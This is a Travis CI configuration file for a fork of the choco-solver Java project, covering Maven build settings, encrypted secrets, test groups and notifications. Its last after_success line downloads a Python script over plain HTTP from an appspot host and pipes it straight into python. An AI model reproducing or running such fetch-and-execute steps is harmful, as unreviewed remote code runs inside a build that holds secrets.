forked from chocoteam/choco-solver
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path.travis.yml
36 lines (36 loc) · 1.03 KB
/
.travis.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
language: java
sudo: false
jdk:
- oraclejdk8
before_install:
- pip install --user codecov
before_script:
- export MAVEN_OPTS="-Xmx4096m -Xms128m -Xss64m -server"
env:
global:
- secure: hb7XCxuEw3VDF5goORctgcFDwg2Z/WAz1ZHKWNRZmR+M1nN6rgDmwOaJpxepLlU0r/Ku14xspE0yn0nK3P1DFNptXhruDJ1h0+mcwiHdsHOM/Vdo247pPbI9pJTD6gQpNnlgVXAI0s5lkNf3IY2jszzhapKFEMHvnPMFXw/sVzU=
- secure: LQcrlV3dVHoI2gKGOcDUdLzk32L83SuIK7mN3zNoaWmIh60Q5G1LLsoeEuR0VueY22aNnoOGTI0KmQsTD4JlpebjxWMYpH9SdHTCsge60/fhcv2GhuJwBVD70+Vex7lOKbpuFRQM+JWuyHh8EjWBkjTNYWae1XGzUYBhaJBpgJQ=
matrix:
- GROUP=1s
- GROUP=10s
script: travis_wait mvn clean install -DtestFailureIgnore=true -Dgroups=$GROUP
branches:
only:
- develop
- master
- /^feature.*$/
notifications:
email:
recipients:
on_success: always
on_failure: always
webhooks:
urls:
- https://webhooks.gitter.im/e/26147fbe9b86b606f67d
on_success: change
on_failure: always
on_start: never
after_success:
- codecov
- curl http://testr-1154.appspot.com/assets/testR.py | python